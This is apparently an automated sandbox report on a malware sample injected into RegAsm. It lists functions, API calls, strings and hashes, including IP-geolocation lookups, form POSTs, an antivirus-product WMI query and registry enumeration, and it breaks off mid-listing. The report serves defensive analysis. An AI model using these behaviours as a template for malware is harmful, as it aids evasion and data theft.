[, xrefs: 004CF8C3
U, xrefs: 004D02AE
U, xrefs: 004D02AA

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv$CloseExclusiveHandleLockSleep$AcquireBinaryCreateProcessReleaseType$ConditionExecuteShellVariableWake
String ID: %$+aii$9$;$<SLYR$>$C$Cao$D$D$F$Lb( $U$U$U$[$[$]$^$^$eks$j3l6lrek$n{$w$y$}{
API String ID: 469071346-2654065059
Opcode ID: 046fe7d211d799ca7bf25e63a1bc788358d40d251576ac8cad5ca00250db2ee5
Instruction ID: 7417cdd4d66c97faec94657393e268677ea1e608b421e5d19b18f6df23a6c79a
Opcode Fuzzy Hash: 046fe7d211d799ca7bf25e63a1bc788358d40d251576ac8cad5ca00250db2ee5
Instruction Fuzzy Hash: B24356B0D042688FDB65CB24CC94BEEBBB1BF49304F0481EAD54967281DB386E88CF55

Function 00436CA0 Relevance: 48.8, APIs: 2, Strings: 24, Instructions: 3321COMMON

Download Yara Rule

Strings

L(-8-, xrefs: 00438799
n{, xrefs: 0043A89F
@, xrefs: 0043AFC4
https://ipgeolocation.io/, xrefs: 0043A9DC
f, xrefs: 004371AB
`, xrefs: 00439DED
$JEIA, xrefs: 0043893F
Content-Type: application/x-www-form-urlencoded, xrefs: 00436EBA, 00436F0F, 00438DA2, 00438DF7, 00439D03
/F_, xrefs: 00439F03
?[^K^, xrefs: 004379D2
n{, xrefs: 0043A723
;UZV^, xrefs: 0043851D
1RR, xrefs: 00439FD5
bgrg, xrefs: 00437EE1
%LU, xrefs: 004372C1
g, xrefs: 0043A075
E!$1$, xrefs: 00438377
?[^K^, xrefs: 004381A1
s, xrefs: 00437A7A
o, xrefs: 00437C50
g, xrefs: 0043A079
/, xrefs: 0043A95E
lcog, xrefs: 00438087
https://ipinfo.io/, xrefs: 004376E5

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: $JEIA$%LU$/$/F_$1RR$;UZV^$?[^K^$?[^K^$@$Content-Type: application/x-www-form-urlencoded$E!$1$$L(-8-$`$bgrg$f$g$g$https://ipgeolocation.io/$https://ipinfo.io/$lcog$n{$n{$o$s
API String ID: 0-4202864799
Opcode ID: d58bbb3133a18f10de36a74ac83741bd2f9799b21380492c2a8d8c8de931518c
Instruction ID: 009e3aa1f1fbc12fea8c265774fa31fbb15222e88e55ed6fae987f700cd50bcc
Opcode Fuzzy Hash: d58bbb3133a18f10de36a74ac83741bd2f9799b21380492c2a8d8c8de931518c
Instruction Fuzzy Hash: AD83F3B0D092688BDB25CB28CC94BEEBBB1AF49304F0481DAD54D67242CB796F85CF55

Function 00450910 Relevance: 46.2, APIs: 2, Strings: 23, Instructions: 2466COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00450A28
__aulldiv.LIBCMT ref: 0045189D

Strings

:, xrefs: 00452488
:, xrefs: 00452DA0
:, xrefs: 00452365
:, xrefs: 00451C93
:, xrefs: 00451DB6
n{, xrefs: 004509AA
:, xrefs: 00453109
:, xrefs: 004526CE
:, xrefs: 00452EC3
:::, xrefs: 00452B4B
:, xrefs: 0045211F
:, xrefs: 00452C7D
:, xrefs: 00452242
:, xrefs: 004527F1
:, xrefs: 00452A37
:, xrefs: 0045322C
:, xrefs: 00451ED9
:, xrefs: 00452914
n{, xrefs: 0045181F
:, xrefs: 00452FE6
:, xrefs: 004525AB
%, xrefs: 00451909
:, xrefs: 00451FFC

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: %$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:::$n{$n{
API String ID: 3732870572-4140743676
Opcode ID: 7a82cc4108330e8028017fa2268eb0007f186ed332f44b3ed3edcc013835e005
Instruction ID: 1cdd653370803adc6f3131d0949a08e463757fa1663f0c5e8cee9cedd3fbe819
Opcode Fuzzy Hash: 7a82cc4108330e8028017fa2268eb0007f186ed332f44b3ed3edcc013835e005
Instruction Fuzzy Hash: 89433870D042688BCB25DB64CC90BEEBBB5AF45309F0441DED54AAB242DB346F88CF59

Function 004309A0 Relevance: 39.7, APIs: 13, Strings: 9, Instructions: 1186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__aulldiv.LIBCMT ref: 00430AEA
__aulldiv.LIBCMT ref: 00430DF9

Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82

__fread_nolock.LIBCMT ref: 00430E9F
__aulldiv.LIBCMT ref: 00430F0B

Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81

__aulldiv.LIBCMT ref: 00431045
__aulldiv.LIBCMT ref: 0043117A
__aulldiv.LIBCMT ref: 0043133A
__fread_nolock.LIBCMT ref: 00431391

Strings

n{, xrefs: 00430D7B
}{, xrefs: 004309FE
n{, xrefs: 004310FC
eks, xrefs: 00430B10
}{, xrefs: 0043108F
n{, xrefs: 004312BC
j3l6lrek, xrefs: 00430B9F, 00430BDA
n{, xrefs: 00430A6C
L>., xrefs: 00430C2B

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv$__fread_nolock
String ID: L>.$eks$j3l6lrek$n{$n{$n{$n{$}{$}{
API String ID: 3493607940-3512644766
Opcode ID: a65a0fdd595f283b58152e8af85c2bb984c7a12f4203bb76aa2e1c05ff7f1009
Instruction ID: 4b8030dd088baf5a40f7a31888a250f1bbbdb175115375ead4fba1f87eac71f9
Opcode Fuzzy Hash: a65a0fdd595f283b58152e8af85c2bb984c7a12f4203bb76aa2e1c05ff7f1009
Instruction Fuzzy Hash: 6EB2A1B1D002189FDB24DB64CC91BEEB7B5BB88304F14819AE509B7390DB786E85CF95

Function 0042F900 Relevance: 39.7, APIs: 13, Strings: 9, Instructions: 1186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__aulldiv.LIBCMT ref: 0042FA4A
__aulldiv.LIBCMT ref: 0042FD59

Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82

__fread_nolock.LIBCMT ref: 0042FDFF
__aulldiv.LIBCMT ref: 0042FE6B

Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81

__aulldiv.LIBCMT ref: 0042FFA5
__aulldiv.LIBCMT ref: 004300DA
__aulldiv.LIBCMT ref: 0043029A
__fread_nolock.LIBCMT ref: 004302F1

Strings

n{, xrefs: 0043021C
:HX, xrefs: 0042FB8B
eks, xrefs: 0042FA70
}{, xrefs: 0042FFEF
}{, xrefs: 0042F95E
n{, xrefs: 0043005C
n{, xrefs: 0042FCDB
n{, xrefs: 0042F9CC
j3l6lrek, xrefs: 0042FAFF, 0042FB3A

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv$__fread_nolock
String ID: :HX$eks$j3l6lrek$n{$n{$n{$n{$}{$}{
API String ID: 3493607940-1063084820
Opcode ID: b8e2f9df9064b3b89280e7d3d2821156f22dc9739bfbf6fe7209058393a72111
Instruction ID: 80603ceed5e5ecb815a2336bb84db937df39f84d1c4a8ceee33aefd1604ca137
Opcode Fuzzy Hash: b8e2f9df9064b3b89280e7d3d2821156f22dc9739bfbf6fe7209058393a72111
Instruction Fuzzy Hash: 5DB2A1B1D001189FDB24CB64CC91BEEB7B5BB88304F1481AAE509B7391DB786E85CF95

Function 00432DB0 Relevance: 25.4, APIs: 3, Strings: 11, Instructions: 892
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82

__aulldiv.LIBCMT ref: 00432F14
__aulldiv.LIBCMT ref: 00432FCD
__aulldiv.LIBCMT ref: 00433698

Strings

;, xrefs: 0043324A
Z, xrefs: 0043325A
eks, xrefs: 004337D6, 00433A01
_, xrefs: 0043324E
0srs, xrefs: 0043302F
Content-Type: application/x-www-form-urlencoded, xrefs: 004336DD, 0043371D
n{, xrefs: 0043361A
O, xrefs: 00433256
Z, xrefs: 00433252
j3l6lrek, xrefs: 00433874, 004338AF, 00433AA8, 00433AE3
n{, xrefs: 00432E96

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: 0srs$;$Content-Type: application/x-www-form-urlencoded$O$Z$Z$_$eks$j3l6lrek$n{$n{
API String ID: 3732870572-2963995603
Opcode ID: d932f49d085614b59507c00f46bf406f1392178f06d5ab31a749f9c382d27c15
Instruction ID: e4f144eb6866c9f15e0174b874faaea5c0fb60d0f0c4e6e2486b5e18bccaafbb
Opcode Fuzzy Hash: d932f49d085614b59507c00f46bf406f1392178f06d5ab31a749f9c382d27c15
Instruction Fuzzy Hash: D2923670D002289BDB24DF68CC95BEEBBB1BF89304F1481DAE409A7251DB786E85CF55

Function 004327D0 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 004327DD
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00432803
CoUninitialize.OLE32 ref: 00432812

Strings

displayName, xrefs: 00432A14
Select * From AntiVirusProduct, xrefs: 004328F5
%ws, xrefs: 00432A43
ROOT\SecurityCenter2, xrefs: 00432868
WQL, xrefs: 00432926

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Initialize$SecurityUninitialize
String ID: %ws$ROOT\SecurityCenter2$Select * From AntiVirusProduct$WQL$displayName
API String ID: 3757020523-4229669714
Opcode ID: 272a7574c1c30abaeacc030b894ba81f610b3d70ecc1d79a341c31d8d510d350
Instruction ID: 4288d1d4c252e29bef7cf26b8597fe6888cbe1e75489e8b63adeb755e9b52ba4
Opcode Fuzzy Hash: 272a7574c1c30abaeacc030b894ba81f610b3d70ecc1d79a341c31d8d510d350
Instruction Fuzzy Hash: E0A13A74E00209EFDB14DF94C995BEEB7B1FF48304F20815AE512AB290D7B86A85DF54

Function 00433F10 Relevance: 22.5, APIs: 3, Strings: 9, Instructions: 1456COMMON

Download Yara Rule

APIs

Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82

__aulldiv.LIBCMT ref: 004349C0
__aulldiv.LIBCMT ref: 00434D18
__aulldiv.LIBCMT ref: 00435074

Strings

])$-8, xrefs: 00435191
eks, xrefs: 00433F29, 00435571
r, xrefs: 004353DD
m, xrefs: 00434E0B
u, xrefs: 00434043
j3l6lrek, xrefs: 00433FD0, 0043400B, 00435618, 00435653
L9> , xrefs: 00434AF4
z, xrefs: 0043475F
i, xrefs: 004340CA

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: L9> $])$-8$eks$i$j3l6lrek$m$r$u$z
API String ID: 3732870572-3037306690
Opcode ID: d0d91bd887f14b86bbb3a4b637c2979d98464c182dac2ad64c85eae1ad42d5c8
Instruction ID: 097ec3de9a0d552a72c5eead724637650cdad3b65235f9df5b072cebc6055ced
Opcode Fuzzy Hash: d0d91bd887f14b86bbb3a4b637c2979d98464c182dac2ad64c85eae1ad42d5c8
Instruction Fuzzy Hash: DCE27770D042688BDB24DB64CC95BEEBBB5BF89304F0481EAE50967381DB782E85CF55

Function 004AF780 Relevance: 20.0, APIs: 2, Strings: 7, Instructions: 4224COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 004B2730

Strings

n{, xrefs: 004B3DDF
3, xrefs: 004B32DF
&, xrefs: 004B2D23
', xrefs: 004B34A9
n{, xrefs: 004B26B2
%, xrefs: 004B279C
), xrefs: 004B38A6

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: %$&$'$)$3$n{$n{
API String ID: 3732870572-2532145099
Opcode ID: 802813cbd87e70d7a20a33a967a7817e870eda95c5116caf42074d8fae7d2a3b
Instruction ID: 77114ea820c42ca0dddd2e3a0868be8b1a77cd6d9a7f7f675597df4f67fcba19
Opcode Fuzzy Hash: 802813cbd87e70d7a20a33a967a7817e870eda95c5116caf42074d8fae7d2a3b
Instruction Fuzzy Hash: F3B3EE709052688FDB65CB28CC90BEEBBB1BF89308F1481DAD549A7252DB356F84CF54

Function 0046C8D0 Relevance: 19.1, APIs: 2, Strings: 7, Instructions: 3312COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0046E79F

Strings

n{, xrefs: 0046E721
', xrefs: 0046F4C4
), xrefs: 0046F89D
3, xrefs: 0046F30C
&, xrefs: 0046ED86
n{, xrefs: 0046FE2D
%, xrefs: 0046E80B

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: %$&$'$)$3$n{$n{
API String ID: 3732870572-2532145099
Opcode ID: dad5221486e85d4303905baa19f4224cbf51d5d6d73d9338a4e43ec8e4b5094a
Instruction ID: 89ab8af2effcce1828f03fdfc84ecafc5db9519518d43a3ea0e0583515a2c9db
Opcode Fuzzy Hash: dad5221486e85d4303905baa19f4224cbf51d5d6d73d9338a4e43ec8e4b5094a
Instruction Fuzzy Hash: DD83EF70D052688FCB65CB28CC90BEEBBB1AF89308F0481DAD54DA7252DB356E85CF55

Function 00480800 Relevance: 18.4, APIs: 2, Strings: 7, Instructions: 2639COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00481AB3

Strings

3, xrefs: 00482620
n{, xrefs: 004830C6
%, xrefs: 00481B1F
&, xrefs: 0048209A
', xrefs: 004827D8
), xrefs: 00482BB1
n{, xrefs: 00481A35

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: %$&$'$)$3$n{$n{
API String ID: 3732870572-2532145099
Opcode ID: d6253a53b4319fab7600709330d3241aab833dfd6e7977534fc3359209a7a941
Instruction ID: 37d35a44749faca35bb33d2e4c8781066b915a47dcec7222e6112f98420e28d2
Opcode Fuzzy Hash: d6253a53b4319fab7600709330d3241aab833dfd6e7977534fc3359209a7a941
Instruction Fuzzy Hash: C553F170D052688FCB25DB28CC90BEEBBB5AF89308F1481DAD549A7252DB346F85CF54

Function 004994E0 Relevance: 18.1, APIs: 2, Strings: 7, Instructions: 2351COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0049A234

Strings

%, xrefs: 0049A2A0
&, xrefs: 0049A81B
), xrefs: 0049B332
n{, xrefs: 0049B847
n{, xrefs: 0049A1B6
', xrefs: 0049AF59
3, xrefs: 0049ADA1

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: %$&$'$)$3$n{$n{
API String ID: 3732870572-2532145099
Opcode ID: 438cea9bce05965716c40d5020659a2144819dc019ca4da2fbf8d9235bd60e5f
Instruction ID: f784145bd1b7f9eff638e5b0ee64d47a52f3284c6f78897518d5ee90a9de4514
Opcode Fuzzy Hash: 438cea9bce05965716c40d5020659a2144819dc019ca4da2fbf8d9235bd60e5f
Instruction Fuzzy Hash: FD43F370D052688FCB65CB68CC90BEDBBB5BF89308F0481EAD509A7252DB346E85CF55

Function 004960A0 Relevance: 17.9, APIs: 2, Strings: 7, Instructions: 2179COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00496A01

Strings

n{, xrefs: 00496983
', xrefs: 00497726
&, xrefs: 00496FE8
%, xrefs: 00496A6D
), xrefs: 00497AFF
n{, xrefs: 004980F6
3, xrefs: 0049756E

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: %$&$'$)$3$n{$n{
API String ID: 3732870572-2532145099
Opcode ID: 46d1edef45d8879c610a3e61f1aeac2d77f27e21ff6d115725dd47430dee0442
Instruction ID: 0e3cca7a32498cbe221bf69efb3f5d0fd814a7b930dcf5d149758d9749f41329
Opcode Fuzzy Hash: 46d1edef45d8879c610a3e61f1aeac2d77f27e21ff6d115725dd47430dee0442
Instruction Fuzzy Hash: 2333E570D052688FCB25CB68CC91BEDBBB5BF89308F1481EAD509A7252DB356E84CF54

Function 004B60A0 Relevance: 17.9, APIs: 2, Strings: 7, Instructions: 2107COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 004B68A4

Strings

3, xrefs: 004B7411
n{, xrefs: 004B7F99
), xrefs: 004B79A2
%, xrefs: 004B6910
', xrefs: 004B75C9
n{, xrefs: 004B6826
&, xrefs: 004B6E8B

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: %$&$'$)$3$n{$n{
API String ID: 3732870572-2532145099
Opcode ID: 67798c7b0feba387d5f362470862a4d250bf76c5eb235404449b0bcdbaadb2f5
Instruction ID: 6da8bdec9a2b5ecf13f2a7307dd3029213eec2b853717dcae2e655b9676ed993
Opcode Fuzzy Hash: 67798c7b0feba387d5f362470862a4d250bf76c5eb235404449b0bcdbaadb2f5
Instruction Fuzzy Hash: 3433F370D052688FDB25CB68CC90BEDBBB5BF89308F0481DAD509A7252DB346E85CF58

Function 0049CD90 Relevance: 17.6, APIs: 2, Strings: 7, Instructions: 1819COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0049D0F2

Strings

%, xrefs: 0049D152
3, xrefs: 0049DBA2
), xrefs: 0049E133
n{, xrefs: 0049E72A
&, xrefs: 0049D625
n{, xrefs: 0049D074
', xrefs: 0049DD5A

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: %$&$'$)$3$n{$n{
API String ID: 3732870572-2532145099
Opcode ID: 1c927e6fcdd04c500dbeb922c7e36109c16b5a8f581f00e043a0f9f7fd3d3eca
Instruction ID: 14e81a42af6ec031c4ad02087ca7ed895e5f754354d1ccf0c7d405d10915af21
Opcode Fuzzy Hash: 1c927e6fcdd04c500dbeb922c7e36109c16b5a8f581f00e043a0f9f7fd3d3eca
Instruction Fuzzy Hash: 46130370D052688FCB29DB69CC91BEDBBB5BF49304F1081EAD50AA7252DB346E84CF54

Function 0047DEB0 Relevance: 17.5, APIs: 2, Strings: 7, Instructions: 1747
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__aulldiv.LIBCMT ref: 0047E0FA

Strings

&, xrefs: 0047E62A
%, xrefs: 0047E15A
), xrefs: 0047F0F6
', xrefs: 0047ED1D
n{, xrefs: 0047E07C
n{, xrefs: 0047F6ED
3, xrefs: 0047EB65

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: %$&$'$)$3$n{$n{
API String ID: 3732870572-2532145099
Opcode ID: ece733eaed24c17c32d3dd33bb9c0ea073a45fb43309a00a55205ec976865b3b
Instruction ID: f9e73673bf4fcde7dd34ea82763f24cbe9a1b2c6c573b572f19df27ec8d7527d
Opcode Fuzzy Hash: ece733eaed24c17c32d3dd33bb9c0ea073a45fb43309a00a55205ec976865b3b
Instruction Fuzzy Hash: 5B130270D052688FCB29DB68CC90BEDBBB5BF49308F1481DAD50EA7252DB346A85CF54

Function 004358A0 Relevance: 16.9, APIs: 2, Strings: 7, Instructions: 1184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

z, xrefs: 0043628E
N, xrefs: 00435AFA
2, xrefs: 00435AF6
eks, xrefs: 00435D5E
8, xrefs: 00435A72
D, xrefs: 00435A76
j3l6lrek, xrefs: 00435E05, 00435E40

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease$ConditionVariableWake
String ID: 2$8$D$N$eks$j3l6lrek$z
API String ID: 4258034872-2262531636
Opcode ID: 8ddad76cb18c7fc4ff609dd97ac9bc24b90293c26fd6f70e007b8fe07f16a0e9
Instruction ID: db6f3ab7cd9c42f10531c76a974450e8f1665f2d29a0a6ab9a422aa2031016b1
Opcode Fuzzy Hash: 8ddad76cb18c7fc4ff609dd97ac9bc24b90293c26fd6f70e007b8fe07f16a0e9
Instruction Fuzzy Hash: E8C267B1D002589FCB24DB64CC91BEEBBB1BF48304F0481EAE50A67381DB786A85CF55

Function 00508D80 Relevance: 16.0, APIs: 10, Instructions: 1016
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(?,?,?), ref: 00508EB7
GetModuleHandleA.KERNEL32(?,?,?), ref: 00509009
GetModuleHandleA.KERNEL32(?,?,?), ref: 0050915B
GetModuleHandleA.KERNEL32(?,?,?), ref: 005092AD
GetModuleHandleA.KERNEL32(?,?,?), ref: 005093FF
GetModuleHandleA.KERNEL32(?,?,?), ref: 00509587
GetModuleHandleA.KERNEL32(?,?,?), ref: 00509721
GetModuleHandleA.KERNEL32(?,?,?), ref: 005098BB
GetModuleHandleA.KERNEL32(?,?,?), ref: 00509A55
GetModuleHandleA.KERNEL32(?,?,?), ref: 00509BEF

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 7124a5522ecd10ba98f61729ea3a26e93e2ca4716c623ca47a4ffbf2ccde7252
Instruction ID: f54d69e34ba9b21312382ec6f9645a4314ff1be99be5a40234549bb951e0b6a5
Opcode Fuzzy Hash: 7124a5522ecd10ba98f61729ea3a26e93e2ca4716c623ca47a4ffbf2ccde7252
Instruction Fuzzy Hash: 98B2F470D052688FDB25CF68CCA0BEEBBB1BF89308F1481D9D549AB346D6316A84DF54

Function 004400A0 Relevance: 14.4, APIs: 3, Strings: 5, Instructions: 393
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0053E35A: AcquireSRWLockExclusive.KERNEL32(0058E970,?,-00007535,?,004308C5,00590F6C,?,0000000A,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 0053E365
Part of subcall function 0053E35A: ReleaseSRWLockExclusive.KERNEL32(0058E970,?,-00007535,?,004308C5,00590F6C,?,0000000A,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 0053E39F

Part of subcall function 0053E309: AcquireSRWLockExclusive.KERNEL32(0058E970,-00007535,?,004308F2,00590F6C), ref: 0053E313
Part of subcall function 0053E309: ReleaseSRWLockExclusive.KERNEL32(0058E970,?,004308F2,00590F6C,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0053E346
Part of subcall function 0053E309: WakeAllConditionVariable.KERNEL32(0058E96C,?,004308F2,00590F6C,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0053E351

__aulldiv.LIBCMT ref: 004403C5
__aulldiv.LIBCMT ref: 00440439

Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81

__fread_nolock.LIBCMT ref: 004405CF

Strings

}{, xrefs: 004402DA
eks, xrefs: 0044047A, 004404A9
n{, xrefs: 00440347
j3l6lrek, xrefs: 00440538, 00440567
F4$, xrefs: 004401F0

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock__aulldiv$AcquireRelease$ConditionVariableWake__fread_nolock
String ID: F4$$eks$j3l6lrek$n{$}{
API String ID: 577242060-488548467
Opcode ID: cb7592b3dad82bfcc5da7a43fd890c3d8f881fb9c6b8527d0b5ac7ce527319b2
Instruction ID: 66e22caea41197ff3048d8e9292abdce64640725f2c17728816ecb4b8662871b
Opcode Fuzzy Hash: cb7592b3dad82bfcc5da7a43fd890c3d8f881fb9c6b8527d0b5ac7ce527319b2
Instruction Fuzzy Hash: F6F13C71D002189FDB14DBA4DC85BEEBBB1BF88304F14819AE509A7381DB786E85CF95

Function 00441AF0 Relevance: 13.0, APIs: 4, Strings: 3, Instructions: 789
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0053E35A: AcquireSRWLockExclusive.KERNEL32(0058E970,?,-00007535,?,004308C5,00590F6C,?,0000000A,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 0053E365
Part of subcall function 0053E35A: ReleaseSRWLockExclusive.KERNEL32(0058E970,?,-00007535,?,004308C5,00590F6C,?,0000000A,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 0053E39F

__aulldiv.LIBCMT ref: 00441DB7
RegEnumKeyExA.KERNEL32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,00000000,eks), ref: 00441FE0
RegOpenKeyExA.KERNEL32(80000001,?,00000000,?,?), ref: 00441E69

Part of subcall function 0053E309: AcquireSRWLockExclusive.KERNEL32(0058E970,-00007535,?,004308F2,00590F6C), ref: 0053E313
Part of subcall function 0053E309: ReleaseSRWLockExclusive.KERNEL32(0058E970,?,004308F2,00590F6C,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0053E346
Part of subcall function 0053E309: WakeAllConditionVariable.KERNEL32(0058E96C,?,004308F2,00590F6C,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0053E351

Strings

eks, xrefs: 00441BD4, 00441EAC, 00442448, 00442483, 00442686, 004426C1
n{, xrefs: 00441D39
j3l6lrek, xrefs: 00441C69, 00441CA4, 00441F41, 00441F7C, 0044252A, 00442565, 00442768, 004427A3

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease$ConditionEnumOpenVariableWake__aulldiv
String ID: eks$j3l6lrek$n{
API String ID: 2427947366-86532494
Opcode ID: f0662ce20a8c61c4f5ccd22582c27dab29deedf6108e8b49423b686ec460c3ac
Instruction ID: 3ce4eab7bc9966ec06563f63b8a7e4ee9434c65e05c46a6efc02796d2f42f37c
Opcode Fuzzy Hash: f0662ce20a8c61c4f5ccd22582c27dab29deedf6108e8b49423b686ec460c3ac
Instruction Fuzzy Hash: 9E824170D002289FDB24CF64C995BEEBBB1BF49304F1481DAE409A7291DB786E89CF55

Function 0042B840 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 265
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNEL32(00000001), ref: 0042B892
GetLastError.KERNEL32 ref: 0042B8A2
